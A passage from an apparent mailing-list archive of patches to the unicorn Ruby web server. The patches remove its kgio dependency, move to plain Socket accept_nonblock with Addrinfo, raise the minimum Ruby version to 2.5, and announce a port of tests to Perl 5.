-  def read(socket)
+  def read_headers(socket, ai)
     e = env
 
     # From https://www.ietf.org/rfc/rfc3875:
@@ -71,7 +71,7 @@ def read(socket)
     #  identify the client for the immediate request to the server;
     #  that client may be a proxy, gateway, or other intermediary
     #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    e['REMOTE_ADDR'] = ai.unix? ? '127.0.0.1' : ai.ip_address
 
     # short circuit the common case with small GET requests first
     socket.readpartial(16384, buf)
@@ -81,7 +81,7 @@ def read(socket)
       false until add_parse(socket.readpartial(16384))
     end
 
-    check_client_connection(socket) if @@check_client_connection
+    check_client_connection(socket, ai) if @@check_client_connection
 
     e['rack.input'] = 0 == content_length ?
                       NULL_IO : @@input_class.new(socket, self)
@@ -107,8 +107,8 @@ def hijacked?
   if Raindrops.const_defined?(:TCP_Info)
     TCPI = Raindrops::TCP_Info.allocate
 
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+    def check_client_connection(socket, ai) # :nodoc:
+      if ai.ip?
         # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
         raise Errno::EPIPE, "client closed connection".freeze,
               EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -152,8 +152,8 @@ def closed_state?(state) # :nodoc:
     # Ruby 2.2+ can show struct tcp_info as a string Socket::Option#inspect.
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+    def check_client_connection(socket, ai) # :nodoc:
+      if @@tcpi_inspect_ok && ai.ip?
         opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
         if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 2f1eb1b..ed5bbf1 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,9 +111,7 @@ def initialize(app, options = {})
 
     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
-      worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
-      end
+      worker_data[1] = worker_data.slice!(1..2).map { |i| IO.for_fd(i) }
       worker_data
     end
   end
@@ -243,10 +241,6 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
     tries = opt[:tries] || 5
     begin
       io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
-        io.autoclose = false
-        io = server_cast(io)
-      end
       logger.info "listening on addr=#{sock_name(io)} fd=#{io.fileno}"
       LISTENERS << io
       io
@@ -594,9 +588,9 @@ def e100_response_write(client, env)
 
   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
-  def process_client(client)
+  def process_client(client, ai)
     @request = Unicorn::HttpRequest.new
-    env = @request.read(client)
+    env = @request.read_headers(client, ai)
 
     if early_hints
       env["rack.early_hints"] = lambda do |headers|
@@ -708,10 +702,9 @@ def worker_loop(worker)
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
       while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
-        # but that will return false
-        if client = sock.kgio_tryaccept
-          process_client(client)
+        client_ai = sock.accept_nonblock(exception: false)
+        if client_ai != :wait_readable
+          process_client(*client_ai)
           worker.tick = time_now.to_i
         end
         break if reopen
@@ -809,7 +802,6 @@ def redirect_io(io, path)
 
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
     immortal = []
 
@@ -825,8 +817,6 @@ def inherit_listeners!
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
       @immortal << io if immortal.include?(fd)
-      io.autoclose = false
-      io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
       logger.info "inherited addr=#{sock_name(io)} fd=#{io.fileno}"
       io
@@ -835,11 +825,9 @@ def inherit_listeners!
     config_listeners = config[:listeners].dup
     LISTENERS.replace(inherited)
 
-    # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
-    # objects share the same OS-level file descriptor as the higher-level
-    # *Server objects; we need to prevent Socket objects from being
-    # garbage-collected
+    # we only use generic Socket objects for aggregate Socket#accept_nonblock
+    # return value [ Socket, Addrinfo ].  This allows us to avoid having to
+    # make getpeername(2) syscalls later on to fill in env['REMOTE_ADDR']
     config_listeners -= listener_names
     if config_listeners.empty? && LISTENERS.empty?
       config_listeners << Unicorn::Const::DEFAULT_LISTEN
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 91a8e51..db9f2cb 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -65,8 +65,8 @@ def self.new(app, interval = 5, path = %r{\A/})
   end
 
   #:stopdoc:
-  def process_client(client)
-    super(client) # Unicorn::HttpServer#process_client
+  def process_client(*args)
+    super(*args) # Unicorn::HttpServer#process_client
     env = instance_variable_get(:@request).env
     if OOBGC_PATH =~ env['PATH_INFO'] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index c2ba75e..06ec2b2 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,32 +3,6 @@
 require 'socket'
 
 module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
-  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
-    require 'unicorn/write_splat'
-    UNIXClient = Class.new(Kgio::Socket) # :nodoc:
-    class UNIXSrv < Kgio::UNIXServer # :nodoc:
-      include Unicorn::WriteSplat
-      def kgio_tryaccept # :nodoc:
-        super(UNIXClient)
-      end
-    end
-    TCPClient.__send__(:include, Unicorn::WriteSplat)
-  else # Ruby 2.5+
-    UNIXSrv = Kgio::UNIXServer
-  end
-
   module SocketHelper
 
     # internal interface
@@ -105,7 +79,7 @@ def set_tcp_sockopt(sock, opt)
     def set_server_sockopt(sock, opt)
       opt = DEFAULTS.merge(opt || {})
 
-      TCPSocket === sock and set_tcp_sockopt(sock, opt)
+      set_tcp_sockopt(sock, opt) if sock.local_address.ip?
 
       rcvbuf, sndbuf = opt.values_at(:rcvbuf, :sndbuf)
       if rcvbuf || sndbuf
@@ -149,7 +123,9 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          UNIXSrv.new(address)
+          s = Socket.new(:UNIX, :STREAM)
+          s.bind(Socket.sockaddr_un(address))
+          s
         ensure
           File.umask(old_umask)
         end
@@ -177,8 +153,7 @@ def new_tcp_server(addr, port, opt)
         sock.setsockopt(:SOL_SOCKET, :SO_REUSEPORT, 1)
       end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
-      sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      sock
     end
 
     # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -194,10 +169,6 @@ def tcp_name(sock)
     def sock_name(sock)
       case sock
       when String then sock
-      when UNIXServer
-        Socket.unpack_sockaddr_un(sock.getsockname)
-      when TCPServer
-        tcp_name(sock)
       when Socket
         begin
           tcp_name(sock)
@@ -210,16 +181,5 @@ def sock_name(sock)
     end
 
     module_function :sock_name
-
-    # casts a given Socket to be a TCPServer or UNIXServer
-    def server_cast(sock)
-      begin
-        Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
-      rescue ArgumentError
-        UNIXSrv.for_fd(sock.fileno)
-      end
-    end
-
   end # module SocketHelper
 end # module Unicorn
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index ad5814c..4af31be 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -71,8 +71,8 @@ def soft_kill(sig) # :nodoc:
   end
 
   # this only runs when the Rack app.call is not running
-  # act like a listener
-  def kgio_tryaccept # :nodoc:
+  # act like Socket#accept_nonblock(exception: false)
+  def accept_nonblock(*_unused) # :nodoc:
     case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
@@ -82,7 +82,7 @@ def kgio_tryaccept # :nodoc:
     when nil # EOF: master died, but we are at a safe place to exit
       fake_sig(:QUIT)
     when :wait_readable # keep waiting
-      return false
+      return :wait_readable
     end while true # loop, as multiple signals may be sent
   end
 
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..224cb06 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..7f40601 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 7f22b24..53ae944 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -10,14 +10,9 @@
 
 class RequestTest < Test::Unit::TestCase
 
-  class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
-    end
-  end
+  MockRequest = Class.new(StringIO)
+
+  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
 
   def setup
     @request = HttpRequest.new
@@ -30,7 +25,7 @@ def setup
   def test_options
     client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '', env['REQUEST_PATH']
     assert_equal '', env['PATH_INFO']
     assert_equal '*', env['REQUEST_URI']
@@ -40,7 +35,7 @@ def test_options
   def test_absolute_uri_with_query
     client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'y=z', env['QUERY_STRING']
@@ -50,7 +45,7 @@ def test_absolute_uri_with_query
   def test_absolute_uri_with_fragment
     client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal '', env['QUERY_STRING']
@@ -61,7 +56,7 @@ def test_absolute_uri_with_fragment
   def test_absolute_uri_with_query_and_fragment
     client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'a=b', env['QUERY_STRING']
@@ -73,7 +68,7 @@ def test_absolute_uri_unsupported_schemes
     %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
       client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
                                "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read(client) }
+      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
     end
   end
 
@@ -81,7 +76,7 @@ def test_x_forwarded_proto_https
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: https\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "https", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -90,7 +85,7 @@ def test_x_forwarded_proto_http
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: http\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -99,14 +94,14 @@ def test_x_forwarded_proto_invalid
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: ftp\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
 
   def test_rack_lint_get
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_equal '127.0.0.1', env['REMOTE_ADDR']
     assert_kind_of Array, @lint.call(env)
@@ -114,7 +109,7 @@ def test_rack_lint_get
 
   def test_no_content_stringio
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -122,7 +117,7 @@ def test_zero_content_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 0\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -130,7 +125,7 @@ def test_real_content_not_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal Unicorn::TeeInput, env['rack.input'].class
   end
 
@@ -141,7 +136,7 @@ def test_rack_lint_put
       "Content-Length: 5\r\n" \
       "\r\n" \
       "abcde")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_kind_of Array, @lint.call(env)
   end
@@ -152,14 +147,6 @@ def test_rack_lint_big_put
     buf = (' ' * bs).freeze
     length = bs * count
     client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
     client.syswrite(
       "PUT / HTTP/1.1\r\n" \
       "Host: foo\r\n" \
@@ -167,7 +154,7 @@ def client.kgio_read!(*args)
       "\r\n")
     count.times { assert_equal bs, client.syswrite(buf) }
     assert_equal 0, client.sysseek(0)
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_equal length, env['rack.input'].size
     count.times {
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index 62d5a3a..a446f06 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -24,7 +24,8 @@ def test_bind_listen_tcp
     port = unused_port @test_addr
     @tcp_listener_name = "#@test_addr:#{port}"
     @tcp_listener = bind_listen(@tcp_listener_name)
-    assert TCPServer === @tcp_listener
+    assert Socket === @tcp_listener
+    assert @tcp_listener.local_address.ip?
     assert_equal @tcp_listener_name, sock_name(@tcp_listener)
   end
 
@@ -38,10 +39,10 @@ def test_bind_listen_options
       { :backlog => 16, :rcvbuf => 4096, :sndbuf => 4096 }
     ].each do |opts|
       tcp_listener = bind_listen(tcp_listener_name, opts)
-      assert TCPServer === tcp_listener
+      assert tcp_listener.local_address.ip?
       tcp_listener.close
       unix_listener = bind_listen(unix_listener_name, opts)
-      assert UNIXServer === unix_listener
+      assert unix_listener.local_address.unix?
       unix_listener.close
     end
   end
@@ -52,11 +53,13 @@ def test_bind_listen_unix
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path)
-    assert UNIXServer === @unix_listener
+    assert Socket === @unix_listener
+    assert @unix_listener.local_address.unix?
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert File.readable?(@unix_listener_path), "not readable"
     assert File.writable?(@unix_listener_path), "not writable"
     assert_equal 0777, File.umask
+    assert_equal @unix_listener, bind_listen(@unix_listener)
   ensure
     File.umask(old_umask)
   end
@@ -67,7 +70,6 @@ def test_bind_listen_unix_umask
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path, :umask => 077)
-    assert UNIXServer === @unix_listener
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert_equal 0140700, File.stat(@unix_listener_path).mode
     assert_equal 0777, File.umask
@@ -75,28 +77,6 @@ def test_bind_listen_unix_umask
     File.umask(old_umask)
   end
 
-  def test_bind_listen_unix_idempotent
-    test_bind_listen_unix
-    a = bind_listen(@unix_listener)
-    assert_equal a.fileno, @unix_listener.fileno
-    unix_server = server_cast(@unix_listener)
-    assert UNIXServer === unix_server
-    a = bind_listen(unix_server)
-    assert_equal a.fileno, unix_server.fileno
-    assert_equal a.fileno, @unix_listener.fileno
-  end
-
-  def test_bind_listen_tcp_idempotent
-    test_bind_listen_tcp
-    a = bind_listen(@tcp_listener)
-    assert_equal a.fileno, @tcp_listener.fileno
-    tcp_server = server_cast(@tcp_listener)
-    assert TCPServer === tcp_server
-    a = bind_listen(tcp_server)
-    assert_equal a.fileno, tcp_server.fileno
-    assert_equal a.fileno, @tcp_listener.fileno
-  end
-
   def test_bind_listen_unix_rebind
     test_bind_listen_unix
     new_listener = nil
@@ -107,14 +87,18 @@ def test_bind_listen_unix_rebind
     File.unlink(@unix_listener_path)
     new_listener = bind_listen(@unix_listener_path)
 
-    assert UNIXServer === new_listener
     assert new_listener.fileno != @unix_listener.fileno
     assert_equal sock_name(new_listener), sock_name(@unix_listener)
     assert_equal @unix_listener_path, sock_name(new_listener)
     pid = fork do
-      client = server_cast(new_listener).accept
-      client.syswrite('abcde')
-      exit 0
+      begin
+        client, _ = new_listener.accept
+        client.syswrite('abcde')
+        exit 0
+      rescue => e
+        warn "#{e.message} (#{e.class})"
+        exit 1
+      end
     end
     s = unix_socket(@unix_listener_path)
     IO.select([s])
@@ -123,32 +107,6 @@ def test_bind_listen_unix_rebind
     assert status.success?
   end
 
-  def test_server_cast
-    test_bind_listen_unix
-    test_bind_listen_tcp
-    unix_listener_socket = Socket.for_fd(@unix_listener.fileno)
-    assert Socket === unix_listener_socket
-    @unix_server = server_cast(unix_listener_socket)
-    assert_equal @unix_listener.fileno, @unix_server.fileno
-    assert UNIXServer === @unix_server
-    assert_equal(@unix_server.path, @unix_listener.path,
-                 "##{@unix_server.path} != #{@unix_listener.path}")
-    assert File.socket?(@unix_server.path)
-    assert_equal @unix_listener_path, sock_name(@unix_server)
-
-    tcp_listener_socket = Socket.for_fd(@tcp_listener.fileno)
-    assert Socket === tcp_listener_socket
-    @tcp_server = server_cast(tcp_listener_socket)
-    assert_equal @tcp_listener.fileno, @tcp_server.fileno
-    assert TCPServer === @tcp_server
-    assert_equal @tcp_listener_name, sock_name(@tcp_server)
-  end
-
-  def test_sock_name
-    test_server_cast
-    sock_name(@unix_server)
-  end
-
   def test_tcp_defer_accept_default
     return unless defined?(TCP_DEFER_ACCEPT)
     port = unused_port @test_addr
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 2a14135..7986ca7 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -9,7 +9,7 @@ def setup
     @rs = "\n"
     $/ == "\n" or abort %q{test broken if \$/ != "\\n"}
     @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 6f5bc8a..607ce87 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -10,7 +10,7 @@ class TeeInput < Unicorn::TeeInput
 
 class TestTeeInput < Test::Unit::TestCase
   def setup
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
     @rs = "\n"
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
   # won't have descriptive text, only the numeric status.
   s.add_development_dependency(%q<rack>)
 
-  s.add_dependency(%q<kgio>, '~> 2.6')
   s.add_dependency(%q<raindrops>, '~> 0.7')
 
   s.add_development_dependency('test-unit', '~> 3.0')

[-- Attachment #4: 0003-update-dependency-to-Ruby-2.5.patch --]
[-- Type: text/x-diff, Size: 3257 bytes --]

From c67ebf96edc8ca691dfc556d4813fed242fe77ca Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 09:14:11 +0000
Subject: [RFC 3/3] update dependency to Ruby 2.5+

We actually need Ruby 2.3+ for `accept_nonblock(exception: false)';
and (AFAIK) we can't easily use a subclass of `Socket' while using
Socket#accept_nonblock to inject WriteSplat support for
`IO#write(*multi_args)'

So just depend on Ruby 2.5+ since all my Ruby is already on the
already-ancient Ruby 2.7+ anyways.
---
 HACKING                    | 2 +-
 README                     | 2 +-
 lib/unicorn/write_splat.rb | 7 -------
 t/README                   | 2 +-
 unicorn.gemspec            | 4 ++--
 5 files changed, 5 insertions(+), 12 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

diff --git a/HACKING b/HACKING
index 020209e..5aca83e 100644
--- a/HACKING
+++ b/HACKING
@@ -60,7 +60,7 @@ becomes unavailable.
 
 === Ruby/C Compatibility
 
-We target C Ruby 2.0 and later.  We need the Ruby
+We target C Ruby 2.5 and later.  We need the Ruby
 implementation to support fork, exec, pipe, UNIX signals, access to
 integer file descriptors and ability to use unlinked files.
 
diff --git a/README b/README
index 5411003..7e29daf 100644
--- a/README
+++ b/README
@@ -12,7 +12,7 @@ both the the request and response in between unicorn and slow clients.
   cut out everything that is better supported by the operating system,
   {nginx}[https://nginx.org/] or {Rack}[https://rack.github.io/].
 
-* Compatible with Ruby 2.0.0 and later.
+* Compatible with Ruby 2.5 and later.
 
 * Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
diff --git a/lib/unicorn/write_splat.rb b/lib/unicorn/write_splat.rb
deleted file mode 100644
index 7e6e363..0000000
--- a/lib/unicorn/write_splat.rb
+++ /dev/null
@@ -1,7 +0,0 @@
-# -*- encoding: binary -*-
-# compatibility module for Ruby <= 2.4, remove when we go Ruby 2.5+
-module Unicorn::WriteSplat # :nodoc:
-  def write(*arg) # :nodoc:
-    super(arg.join(''))
-  end
-end
diff --git a/t/README b/t/README
index d09c715..7bd093d 100644
--- a/t/README
+++ b/t/README
@@ -14,7 +14,7 @@ Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Ruby 2.5.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
 * {curl}[https://curl.haxx.se/]
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 85183d9..e7e3ef7 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -25,11 +25,11 @@
   s.homepage = 'https://yhbt.net/unicorn/'
   s.test_files = test_files
 
-  # 2.0.0 is the minimum supported version. We don't specify
+  # 2.5.0 is the minimum supported version. We don't specify
   # a maximum version to make it easier to test pre-releases,
   # but we do warn users if they install unicorn on an untested
   # version in extconf.rb
-  s.required_ruby_version = ">= 2.0.0"
+  s.required_ruby_version = ">= 2.5.0"
 
   # We do not have a hard dependency on rack, it's possible to load
   # things which respond to #call.  HTTP status lines in responses

^ permalink raw reply related	[relevance 1%]

* [PATCH 00-23/23] start porting tests to Perl5
@ 2023-06-05 10:32  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-06-05 10:32 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4179 bytes --]

Still a lot more work to do, but at least socat is no longer a
test dependency.  Perl5 is installed on far more systems than
socat.

Ruby introduces breaking changes every year and I can't trust
tests to work as they were originally intended, anymore.
Perl 5 doesn't have perfect backwards compatibility, either; but
it's the least bad of any widely-installed scripting language.

Note: that 23/23 introduces a subtle bugfix which changes
behavior for systemd users

Patches are attached to reduce load on SMTP servers.
Some more patches to come as I deal with Ruby 3.x deprecation
warnings :<

Eric Wong (23):
  switch unit/test_response.rb to Perl 5 integration test
  support rack 3 multi-value headers
  port t0018-write-on-close.sh to Perl 5
  port t0000-http-basic.sh to Perl 5
  port t0002-parser-error.sh to Perl 5
  t/integration.t: use start_req to simplify test slighly
  port t0011-active-unix-socket.sh to Perl 5
  port t0100-rack-input-tests.sh to Perl 5
  tests: use autodie to simplify error checking
  port t0019-max_header_len.sh to Perl 5
  test_exec: drop sd_listen_fds emulation test
  test_exec: drop test_basic and test_config_ru_alt_path
  tests: check_stderr consistently in Perl 5 tests
  tests: consistent tcp_start and unix_start across Perl 5 tests
  port t9000-preread-input.sh to Perl 5
  port t/t0116-client_body_buffer_size.sh to Perl 5
  tests: get rid of sha1sum.rb and rsha1() sh function
  early_hints supports Rack 3 array headers
  test_server: drop early_hints test
  t/integration.t: switch PUT tests to MD5, reuse buffers
  tests: move test_upload.rb tests to t/integration.t
  drop redundant IO#close_on_exec=false calls
  LISTEN_FDS-inherited sockets are immortal across SIGHUP

 GNUmakefile                                |   7 +-
 lib/unicorn/http_server.rb                 |  12 +-
 t/README                                   |  21 +-
 t/active-unix-socket.t                     | 113 +++++++
 t/bin/content-md5-put                      |  36 ---
 t/bin/sha1sum.rb                           |  17 --
 t/{t0116.ru => client_body_buffer_size.ru} |   2 -
 t/client_body_buffer_size.t                |  82 ++++++
 t/integration.ru                           | 114 +++++++
 t/integration.t                            | 326 +++++++++++++++++++++
 t/lib.perl                                 | 217 ++++++++++++++
 t/preread_input.ru                         |  21 +-
 t/rack-input-tests.ru                      |  21 --
 t/t0000-http-basic.sh                      |  50 ----
 t/t0002-parser-error.sh                    |  94 ------
 t/t0011-active-unix-socket.sh              |  79 -----
 t/t0018-write-on-close.sh                  |  23 --
 t/t0019-max_header_len.sh                  |  49 ----
 t/t0100-rack-input-tests.sh                | 124 --------
 t/t0116-client_body_buffer_size.sh         |  80 -----
 t/t9000-preread-input.sh                   |  48 ---
 t/test-lib.sh                              |   4 -
 t/write-on-close.ru                        |  11 -
 test/exec/test_exec.rb                     |  57 ----
 test/unit/test_response.rb                 | 111 -------
 test/unit/test_server.rb                   |  31 --
 test/unit/test_upload.rb                   | 301 -------------------
 27 files changed, 891 insertions(+), 1160 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/bin/content-md5-put
 delete mode 100755 t/bin/sha1sum.rb
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0000-http-basic.sh
 delete mode 100755 t/t0002-parser-error.sh
 delete mode 100755 t/t0011-active-unix-socket.sh
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100755 t/t0019-max_header_len.sh
 delete mode 100755 t/t0100-rack-input-tests.sh
 delete mode 100755 t/t0116-client_body_buffer_size.sh
 delete mode 100755 t/t9000-preread-input.sh
 delete mode 100644 t/write-on-close.ru
 delete mode 100644 test/unit/test_response.rb
 delete mode 100644 test/unit/test_upload.rb

[-- Attachment #2: 0001-switch-unit-test_response.rb-to-Perl-5-integration-t.patch --]
[-- Type: text/x-diff, Size: 15667 bytes --]

From 086e397abc0126556af24df77a976671294df2ee Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:30 +0000
Subject: [PATCH 01/23] switch unit/test_response.rb to Perl 5 integration test

http_response_write may benefit from API changes for Rack 3
support.

Since there's no benefit I can see from using a unit test,
switch to an integration test to avoid having to maintain the
unit test if our internal http_response_write method changes.

Of course, I can't trust tests written in Ruby since I've had to
put up with a constant stream of incompatibilities over the past
two decades :<   Perl is more widely installed than socat[1], and
nearly all the Perl I wrote 20 years ago still works
unmodified today.

[1] the rarest dependency of the Bourne shell integration tests
---
 GNUmakefile                |   5 +-
 t/README                   |  24 +++--
 t/integration.ru           |  38 ++++++++
 t/integration.t            |  64 +++++++++++++
 t/lib.perl                 | 189 +++++++++++++++++++++++++++++++++++++
 test/unit/test_response.rb | 111 ----------------------
 6 files changed, 313 insertions(+), 118 deletions(-)
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 test/unit/test_response.rb

